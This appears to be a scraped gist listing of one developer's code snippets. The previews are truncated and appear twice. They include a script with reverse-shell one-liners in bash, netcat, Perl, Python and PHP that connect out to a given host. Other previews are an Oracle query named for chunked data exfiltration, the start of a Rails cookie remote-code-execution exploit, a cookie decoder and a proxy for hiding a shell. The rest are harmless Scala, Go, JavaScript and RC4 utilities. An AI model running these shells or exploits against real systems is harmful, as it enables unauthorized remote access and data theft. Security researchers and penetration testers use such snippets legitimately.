Chris Frohoff frohoff

## oracle_chunked_xml_exfil.sql
select c from (
  select cast(dbms_lob.substr(t.c, 4000, (n.i) * 4000 + 1) as varchar(4000)) c, t.r i, n.i j
  from ((
    select rownum r, dbms_lob.getlength(c) l, c
    from (
      select dbms_xmlgen.getxml('select * from all_tables') c
      from dual)
  ) t inner join (
    select rownum - 1 as i
    from dual

## print_rails_cookie.sh
 echo "Cookie: _myapp_session=BAh7CDoMdXNlcl9pZGkCxxQ6D3Nlc3Npb25faWQiJTk2NTQ3MjU5NTZmZjIwMDRlY2UyYWNjMjE5Y2Y2YjRkOhBfY3NyZl90b2tlbkkiMUpTQUhsTC9pQkQ0Qy81MWNmdjE1L0dzMEJlNmNyS3FIbmdYbFN6NWxOamM9BjoGRUY%3D--46b8cb0b12995a60b9ce8db30d98b84a08647574" | sed -r 's/^(\s*Cookie:\s*)?(\s*[A-Za-z_-]+=)?|--\w{40}$//g' | sed -r 's/%([0-9a-f]{2})/\\\\x\1/g' | xargs printf | base64 -d | ruby -e "require 'pp'; pp Marshal.load(STDIN.read)"

## rails_cookie_rce.rb
#!/usr/bin/env ruby

require "base64"
require "erb"
require "openssl"
require "optparse"

class ActiveSupport
  class Deprecation
    class DeprecatedInstanceVariableProxy

## callhome.sh
#!/bin/bash

host=$1
port=$2

bash -i >& /dev/tcp/$host/$port 0>&1
nc -e /bin/sh $host $port
perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"

## hide-shell.rb
proxy do |data|
  { :remote =>
    data =~ /(GET|POST|HEAD|PUT|DELETE|OPTIONS|TRACE|CONNECT|PATCH) / ?
    "localhost:81" :
    "localhost:4444"
  }
end

## gogrep.go
package main

import (
  "fmt"
  "os"
  "bufio"
  "regexp"
  "io"
)

## longchaintest.js
var crypto = require('crypto')

var hashType = process.argv[2] || 'sha1'
var numHashes = parseInt(process.argv[3] || 1)

// init chain with stdout
var piped = process.stdout

for (var i = 0; i < numHashes; i++) {
    // prepend chain with new hash

## nullsafe.scala
object NullSafeConversions {
  implicit def ns[A](a:A) = new NullSafe(a)
  implicit def ro[A](o:Option[A]) = new RichOption(o)

  def ?[A](a:A) = if (a == null) Some(a) else None

  case class NullSafe[A](a:A) extends AnyVal {
    def ?[B >: Null](f: A => B):B = if (a != null) f(a) else null
  }
  case class RichOption[A](o:Option[A]) extends AnyVal {

## terse-rc4.rb
->t,k{s=*0..255;j=0;m=256;m.times{|i|j=(j+s[i]+k[i%k.size])%m;s[i],s[j]=s[j],s[i]};i=j=0;t.map{|b|i=(i+1)%m;j=(j+s[i])%m;s[i],s[j]=s[j],s[i];b^s[(s[i]+s[j])%m]}}

## Flow.scala
package org.frohoff.flow

import scala.collection.mutable.Buffer
import Flow._

object Test extends App {
  val f: Flow[Int,Int] = Flow[Int]
  val f2: Flow[Int,String] = f.map(_.toHexString)
  val f3: Flow[Int,Option[Int]] = f.map(Option(_))
  //f3.flatten // doesn't compile yet
	select c from (
	select cast(dbms_lob.substr(t.c, 4000, (n.i) * 4000 + 1) as varchar(4000)) c, t.r i, n.i j
	from ((
	select rownum r, dbms_lob.getlength(c) l, c
	from (
	select dbms_xmlgen.getxml('select * from all_tables') c
	from dual)
	) t inner join (
	select rownum - 1 as i
	from dual
	#!/usr/bin/env ruby

	require "base64"
	require "erb"
	require "openssl"
	require "optparse"

	class ActiveSupport
	class Deprecation
	class DeprecatedInstanceVariableProxy
	#!/bin/bash

	host=$1
	port=$2

	bash -i >& /dev/tcp/$host/$port 0>&1
	nc -e /bin/sh $host $port
	perl -e "use Socket;\$i=\"$host\";\$p=$port;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};"
	python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$host\",$port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);"
	php -r "\$sock=fsockopen(\"$host\",$port);exec(\"/bin/sh -i <&3 >&3 2>&3\");"
	proxy do \|data\|
	{ :remote =>
	data =~ /(GET\|POST\|HEAD\|PUT\|DELETE\|OPTIONS\|TRACE\|CONNECT\|PATCH) / ?
	"localhost:81" :
	"localhost:4444"
	}
	end
	var crypto = require('crypto')

	var hashType = process.argv[2] \|\| 'sha1'
	var numHashes = parseInt(process.argv[3] \|\| 1)

	// init chain with stdout
	var piped = process.stdout

	for (var i = 0; i < numHashes; i++) {
	// prepend chain with new hash
	object NullSafeConversions {
	implicit def ns[A](a:A) = new NullSafe(a)
	implicit def ro[A](o:Option[A]) = new RichOption(o)

	def ?[A](a:A) = if (a == null) Some(a) else None

	case class NullSafe[A](a:A) extends AnyVal {
	def ?[B >: Null](f: A => B):B = if (a != null) f(a) else null
	}
	case class RichOption[A](o:Option[A]) extends AnyVal {
	package org.frohoff.flow

	import scala.collection.mutable.Buffer
	import Flow._

	object Test extends App {
	val f: Flow[Int,Int] = Flow[Int]
	val f2: Flow[Int,String] = f.map(_.toHexString)
	val f3: Flow[Int,Option[Int]] = f.map(Option(_))
	//f3.flatten // doesn't compile yet